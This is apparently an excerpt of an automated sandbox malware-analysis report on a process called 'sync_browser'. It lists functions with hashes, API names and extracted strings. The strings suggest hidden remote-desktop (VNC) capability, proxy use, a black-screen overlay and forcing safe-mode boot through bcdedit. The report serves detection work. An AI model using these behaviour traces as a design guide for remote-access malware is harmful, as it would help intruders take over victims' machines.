                                                                    • Opcode Fuzzy Hash: 9d8487c70b1b00fa5a82c873ed5b00f7b51de020590ec98eeb4ab258b7261688
                                                                    • Instruction Fuzzy Hash: 86017521E1C56B81FA11DB74AC957BE5399EFB8304F800533D51DC6692CE3CE16BCA40
                                                                    Function 00007FF6DC0EC210 Relevance: 6.0, APIs: 4, Instructions: 41fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorFindMode$CloseFileFirst
                                                                    • String ID:
                                                                    • API String ID: 2885216544-0
                                                                    • Opcode ID: 0223ee3f43c164e8854e7b1b386b18195b9e4c924526049b6427bad48412c67f
                                                                    • Instruction ID: d5bda9aa6e4da9f060c0c22ca547c156e251bde1644f85fa07c70f049adb72d6
                                                                    • Opcode Fuzzy Hash: 0223ee3f43c164e8854e7b1b386b18195b9e4c924526049b6427bad48412c67f
                                                                    • Instruction Fuzzy Hash: D5011235B0878586EA248F21B9542AD63A5FB4CBE0F404235EE6D83794CE3DD9568B00
                                                                    Function 00007FF6DC0C5A60 Relevance: 50.9, APIs: 17, Strings: 12, Instructions: 154libraryloaderfileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AddressProc$Library$FileLoad$DeleteFreeModuleName
                                                                    • String ID: Config$CreateIntegratedPluginInterface$CreatePluginInterface$Description$FreeBuffer$GetParams$Reset$RestoreBuffer$SetParams$Shutdown$Startup$TransformBuffer
                                                                    • API String ID: 1650122287-1031704962
                                                                    • Opcode ID: 2e3427beeea8e7963a578434a2b2276026c969c33777596d628f9c5fe35e2b15
                                                                    • Instruction ID: f254d2e214ec8687cfb61e331d9fdc6a793ba38fde2aa7d394e57c0999f0b1a3
                                                                    • Opcode Fuzzy Hash: 2e3427beeea8e7963a578434a2b2276026c969c33777596d628f9c5fe35e2b15
                                                                    • Instruction Fuzzy Hash: A3814235908B9A81EB15DF20E8543EC33A4FB58B98F444136DE6E8B294DF7CD666C720
                                                                    Function 00007FF6DC0F0D40 Relevance: 45.7, APIs: 25, Strings: 1, Instructions: 239windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Object$Select$Delete$CompatibleCreateIconMetricsSystem$CursorDrawFlushInfoRect
                                                                    • String ID: F
                                                                    • API String ID: 2202639625-1304234792
                                                                    • Opcode ID: b79674502bec6eb6e9178b59d754768edd22f48091c48e79f06fd71b0c89d9c2
                                                                    • Instruction ID: 367969f5ef3e0d74f360decd1e5db20fd7a919b38bc2727c6e3d0e362ba857a2
                                                                    • Opcode Fuzzy Hash: b79674502bec6eb6e9178b59d754768edd22f48091c48e79f06fd71b0c89d9c2
                                                                    • Instruction Fuzzy Hash: 66C16E36A046AA8AE790CF65D648AAE73BDFF48B44F010437EE0D93704DF789856CB14
                                                                    Function 00007FF6DC0C3F30 Relevance: 45.6, APIs: 21, Strings: 5, Instructions: 141libraryregistryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Window$MetricsSystem$Long$Load$AddressAdjustClassCreateCursorIconLibraryObjectProcRectRegisterShowStock
                                                                    • String ID: 0$P$SetLayeredWindowAttributes$blackscreen$user32
                                                                    • API String ID: 1337014749-2363801694
                                                                    • Opcode ID: c8f613f4f1137cd039f0d77ff0fdd36da7c317fdbced729bc12fff3d257e6be4
                                                                    • Instruction ID: cec893343ba3f31c9863cb9eebf21cc369c3b13bf79d7fac92f91adead08f4e1
                                                                    • Opcode Fuzzy Hash: c8f613f4f1137cd039f0d77ff0fdd36da7c317fdbced729bc12fff3d257e6be4
                                                                    • Instruction Fuzzy Hash: 3071E936A08B9686E714CF25F85476E73A8FB89B54F10413ADA6E83794DF3CD466CB00
                                                                    Function 00007FF6DC0D3210 Relevance: 36.9, APIs: 10, Strings: 11, Instructions: 133COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: PrivateProfileString$EnvironmentVariable$AttributesErrorExecuteFileForegroundLastShellVersionWindowWrite
                                                                    • String ID: /safeboot:network$/boot.ini$SYSTEMDRIVE$SystemRoot$\system32\$bcdedit.exe$boot loader$default$operating systems$runas$twork
                                                                    • API String ID: 3746257916-1709497384
                                                                    • Opcode ID: 0a761f6e527e6f89f9f2902e2f57a6bb5b8d7dbe4c16f5219fa40f45faea4ce6
                                                                    • Instruction ID: f2098a90b7ff64254fe44a9ff45147915f95364575b5ad9a003aec0ab58af799
                                                                    • Opcode Fuzzy Hash: 0a761f6e527e6f89f9f2902e2f57a6bb5b8d7dbe4c16f5219fa40f45faea4ce6
                                                                    • Instruction Fuzzy Hash: 4D710E35A15A9A99E7108F64EC406ED33A4FB48368F405337EA7D86AD4DF3CD22AC740
                                                                    Function 00007FF6DC0CB550 Relevance: 35.2, APIs: 12, Strings: 8, Instructions: 227COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _wgetenv$freeinet_ntoa$ErrorFreeHeapLast_errnomalloc
                                                                    • String ID: HTTP_PROXY$SOCKS4_RESOLVE$SOCKS4_SERVER$SOCKS5_RESOLVE$SOCKS5_SERVER$SOCKS_RESOLVE$SOCKS_SERVER$http://
                                                                    • API String ID: 3609861302-2295524587
                                                                    • Opcode ID: 198aee5947f50ad03e8d7cc14805ac6ff2a6e37fde4bc76060f889befd90e49f
                                                                    • Instruction ID: 2c8f633cae724a00b9d55bfe053dd6f51cfa76626bbaaa45fbacf8bb84ec5c4e
                                                                    • Opcode Fuzzy Hash: 198aee5947f50ad03e8d7cc14805ac6ff2a6e37fde4bc76060f889befd90e49f
                                                                    • Instruction Fuzzy Hash: 7BA1BF21E0969A85FE65DB24DA503BC2294AF40784F480537DA0DC77E1EF2EEA37C350
                                                                    Function 00007FF6DC0EF040 Relevance: 35.2, APIs: 5, Strings: 15, Instructions: 207threadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: DesktopThread$CurrentObjectOpen$DeleteInformationInputInvalidateRectUser
                                                                    • String ID: Default$vncdesktop.cpp : Break log$vncdesktop.cpp : Driver option disabled $vncdesktop.cpp : Driver option enabled $vncdesktop.cpp : EnableOptimisedBlits Failed$vncdesktop.cpp : InitBitmap Failed$vncdesktop.cpp : InitDesktop Failed$vncdesktop.cpp : InitDesktop...$vncdesktop.cpp : InitVideo driver Called$vncdesktop.cpp : Removing real Dib buffer and replace by driver communication buffer$vncdesktop.cpp : SetPalette Failed$vncdesktop.cpp : SetPixFormat Failed$vncdesktop.cpp : SetPixShift Failed$vncdesktop.cpp : ThunkBitmapInfo Failed$vncdesktop.cpp : no default desktop
                                                                    • API String ID: 421987145-2663527212
                                                                    • Opcode ID: 708c932f2a283d5bbc71d608cba7ab1ab0c10d4bb7afa53f10560fd6fcd4028b
                                                                    • Instruction ID: a9f2737bdda94650a3997199c409100169d1e4ab62d5acfa6e17e392bb564fd3
                                                                    • Opcode Fuzzy Hash: 708c932f2a283d5bbc71d608cba7ab1ab0c10d4bb7afa53f10560fd6fcd4028b
                                                                    • Instruction Fuzzy Hash: A5A13971A58A8B81EB509F61E8542FD2368EF88B44F584133D90EC7295DF3EE56BC350
                                                                    Function 00007FF6DC0D37E0 Relevance: 33.4, APIs: 9, Strings: 10, Instructions: 127COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: PrivateProfileString$EnvironmentVariable$AttributesExecuteFileForegroundShellVersionWindowWrite
                                                                    • String ID: /boot.ini$SYSTEMDRIVE$SystemRoot$\system32\$bcdedit.exe$boot loader$default$eboot$operating systems$runas
                                                                    • API String ID: 3443580464-3826360582
                                                                    • Opcode ID: 8f405f99423453285309b5ba9db0ae769014fde6afb609773d47d48ac683e545
                                                                    • Instruction ID: b8ea9db550e9a949c8a33cf7f912d23fb972390e6e45e70804503809c58f24dd
                                                                    • Opcode Fuzzy Hash: 8f405f99423453285309b5ba9db0ae769014fde6afb609773d47d48ac683e545
                                                                    • Instruction Fuzzy Hash: CC612035A15A9A99E710CF64EC406ED33A4FB48358F401337EA6D86AD4DF3CD22AC740
                                                                    Function 00007FF6DC0CCF80 Relevance: 28.3, APIs: 10, Strings: 6, Instructions: 254libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Free$Globalswscanf$Library$AddressByteCharLoadMultiProcWide
                                                                    • String ID: 443$P$WinHttpGetIEProxyConfigForCurrentUser$http=$https=$winhttp.dll
                                                                    • API String ID: 3955186772-955988753
                                                                    • Opcode ID: f80e017f8dfc52864f10a9d1c006d943c54cd3b71a26042b83a3869f240b4edf
                                                                    • Instruction ID: 420225904e257fa05fe9981caa78fdcf924cde6a04b80b7691d31344b217187f
                                                                    • Opcode Fuzzy Hash: f80e017f8dfc52864f10a9d1c006d943c54cd3b71a26042b83a3869f240b4edf
                                                                    • Instruction Fuzzy Hash: CEB1EE21A0CB8A81EB10CB25EA403BD63A5EB85794F508232EA5D87AC5DF3DD12BC750
                                                                    Function 00007FF6DC0E00F0 Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 123COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: freeinet_ntoa$_errnogetpeernamegetsockname$ErrorFreeHeapLast_invalid_parameter_noinfomalloc
                                                                    • String ID: <unavailable>$Local loop-back connections are disabled.$vncclient.cpp : loopback connection attempted - client accepted$vncclient.cpp : loopback connection attempted - client rejected
                                                                    • API String ID: 3199031719-36275550
                                                                    • Opcode ID: c44d7390c6da1f5effd3baa685ac2797441d9ecea07109d0da10d2a128be3049
                                                                    • Instruction ID: 3b7ac17374607436c7a5c84f6236ed99b6dea17527140a78cbf5da35e13ddffd
                                                                    • Opcode Fuzzy Hash: c44d7390c6da1f5effd3baa685ac2797441d9ecea07109d0da10d2a128be3049
                                                                    • Instruction Fuzzy Hash: 6C516F21B0975A86EA54EF21E8442BD63A8FF88B85F444136DA4DC77A5DF3CE16BC700
                                                                    Function 00007FF6DC12A5B0 Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 117threadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Desktop$Thread$CloseCurrentErrorInformationInputLastObjectOpenUser
                                                                    • String ID: vncservice.cpp : !GetUserObjectInformation(inputdesktop$vncservice.cpp : !GetUserObjectInformation(threaddesktop$vncservice.cpp : OpenInputDesktop %i I$vncservice.cpp : OpenInputDesktop II$vncservice.cpp : failed to close input desktop$vncservice.cpp : threadname, inputname differ
                                                                    • API String ID: 55935355-432259686
                                                                    • Opcode ID: 1e6938374f11850d6f65cb4abe64859311d8d6483033998e6a50ab09662977c7
                                                                    • Instruction ID: f3c901e317f5ea520618ae3bffa5c057a456466fb336e8d607aaf990982c823c
                                                                    • Opcode Fuzzy Hash: 1e6938374f11850d6f65cb4abe64859311d8d6483033998e6a50ab09662977c7
                                                                    • Instruction Fuzzy Hash: D3517124A1CBAB91FB24DB61AC556FD63A9AF85744F604133C94EC2664EF3DE12BC700
                                                                    Function 00007FF6DC0F3260 Relevance: 26.3, APIs: 8, Strings: 7, Instructions: 89threadsynchronizationCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
